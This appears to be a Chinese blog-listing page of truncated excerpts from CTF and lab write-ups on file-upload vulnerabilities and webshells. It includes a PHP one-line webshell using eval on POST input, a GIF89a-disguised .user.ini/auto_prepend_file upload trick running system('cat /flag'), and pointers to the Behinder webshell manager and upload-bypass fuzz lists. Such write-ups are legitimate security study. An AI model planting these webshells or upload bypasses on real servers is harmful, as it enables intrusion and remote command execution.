看起来和3很相似,但是测试未成功发现错误,要用别的方法 查看默认目录得到日志路径,抓包将一句话木马插入于用于代理中 放包后蚁剑进行连接 找到flag ...
分类:
Web程序 时间:
2021-06-02 19:56:24
阅读次数:
0
这种上传类的一般都是利用一句话木马: 1.在记事本里写一句话木马,然后修改后缀。 2.上传之前用burp拦截一下,改一下参数: 3.可以看到显示上传成功,路径也出来了: 4.用蚁剑连一下: 5.一般这种的都在根目录,直接去根目录里找,找到了flag: flag ...
分类:
Web程序 时间:
2021-04-21 12:59:26
阅读次数:
0
首先添加上传一个.user.ini GIF89a auto_prepend_file=a.jpg 再添加上传一个a.jpg GIF89a <script language='php'>system('cat /flag')</script> 在这里可以看到 uploads/33c6f8457bd77 ...
分类:
Web程序 时间:
2020-11-02 09:58:07
阅读次数:
25
工具地址 https://github.com/rebeyond/Behinder/releases 主要功能 自带一句话 工具下载解压之后,里面有五种格式的一句话木马文件 基本信息 如果成功连接,会获取服务器的基本信息,我这里测试的时候连了个php的,显示的是phpinfo内容 命令执行 可以执行 ...
分类:
其他好文 时间:
2020-07-16 21:02:14
阅读次数:
156
攻防世界 i-got-id-200 进入主页面,发现三个链接,御剑扫描一下,并没有发现什么。经过测试,发现,第二第三个界面会将提交的内容显示在页面上。当上传一句话木马时,会被注释掉。考虑用< script>绕过。无果。 后来发现网站是由perl语言所写,这真不会,去看看wp,发现漏洞在param() ...
分类:
其他好文 时间:
2020-06-26 20:03:42
阅读次数:
100
打开环境 根据提示找到 得到网站源码 这源码分为三段 一段一段分析 第一段: <?php session_start(); if (!isset($_GET[page])) { show_source(__FILE__); die(); } if (isset($_GET[page]) && $_G ...
分类:
Web程序 时间:
2020-06-23 21:36:32
阅读次数:
173
upload-labs通关记录 一句话木马解读 一般的解题步骤 或者可以直接用字典爆破一下 https://github.com/TheKingOfDuck/fuzzDicts/blob/master/uploadFileExtDicts/all_upload_fuzz.txt是否上传成功观察:把返 ...
分类:
其他好文 时间:
2020-06-22 21:12:06
阅读次数:
68
大三就快结束啦,也要轮到我找工作啦,结合网上的资料和自己的经验准备了一些材料,算是对自己技术方面的小小总结吧。趁这个机会查缺补漏做一些原来知道但没有动手试过的实验。 一、原理 udf 即 user defined function,文件后缀为.dll。通过在 udf 文件中定义新函数,可以对 mys ...
分类:
数据库 时间:
2020-06-22 12:37:09
阅读次数:
73
记录一下文件上传的常见姿势,更全面的可以做upload-labs。 实验环境:win2003 phpstudy 实验平台:upfile 一、准备上传的一句话木马 eval函数将接受的字符串当做代码执行 二、实验步骤 2.1 无防护上传 可以直接上传一句话木马文件 可以看到已经成功上传,并返回了相关信... ...
分类:
其他好文 时间:
2020-05-13 20:00:17
阅读次数:
63
一句话木马 <?php @eval($_POST['key']); ?> /*eval(phpcode) eval() 函数把字符串按照 PHP 代码来计算。 该字符串必须是合法的 PHP 代码,且必须以分号结尾。*/ 通常是由于对上传文件的类型、内容没有进行严格的过滤、检查,使得攻击者可以通过上传 ...
分类:
Web程序 时间:
2020-04-25 12:21:08
阅读次数:
132
